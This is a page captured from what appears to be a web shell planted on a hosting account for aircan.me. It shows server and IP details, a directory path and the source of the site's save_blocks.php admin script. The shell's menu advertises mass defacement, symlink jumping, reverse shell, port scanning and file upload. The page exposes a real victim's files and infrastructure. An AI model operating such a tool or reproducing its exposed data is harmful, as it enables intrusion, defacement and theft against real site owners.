Tul xxx Tul
User / IP
:
216.73.216.159
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
daniel
/
assets
/
php
/
Viewing: save_blocks.php
<?php session_start(); if (!isset($_SESSION['user_id'])) { header('Location: ../../admin/login.php'); exit(); } require_once __DIR__ . '/db.php'; try { $pdo = db(); } catch (PDOException $e) { die('Error de conexión: ' . $e->getMessage()); } function isAjax() { return isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) === 'xmlhttprequest'; } if ($_SERVER['REQUEST_METHOD'] === 'POST') { $base = '/0.14-Curriculum_Daniel/admin/dashboard.php'; $section = isset($_POST['section']) ? trim($_POST['section']) : ''; if ($section === '') { if (isAjax()) { http_response_code(400); header('Content-Type: application/json'); echo json_encode(['ok' => false, 'error' => 'Sección no válida']); exit(); } else { header('Location: ' . $base . '?error=Secci%C3%B3n%20no%20v%C3%A1lida'); exit(); } } $stmt = $pdo->prepare('INSERT INTO content_blocks (section, field, content) VALUES (:section, :field, :content) ON DUPLICATE KEY UPDATE content = VALUES(content)'); $updated = []; foreach ($_POST as $key => $value) { if (in_array($key, ['section', 'redirect'], true)) continue; if (is_array($value)) $value = implode(", ", $value); $stmt->execute([ ':section' => $section, ':field' => $key, ':content' => $value, ]); $updated[$key] = $value; } if (isAjax()) { header('Content-Type: application/json'); echo json_encode(['ok' => true, 'section' => $section, 'updated' => $updated]); exit(); } // Mapear sección a pestaña $tabMap = [ 'header' => 'general-tab', 'social' => 'general-tab', 'about' => 'about-tab', 'general'=> 'general-tab', ]; $tab = isset($tabMap[$section]) ? $tabMap[$section] : ''; $hash = $tab ? ('#' . $tab) : ''; header('Location: ' . $base . '?ok=1' . $hash); exit(); } echo 'Método no permitido';
Coded With 💗 by
0x6ick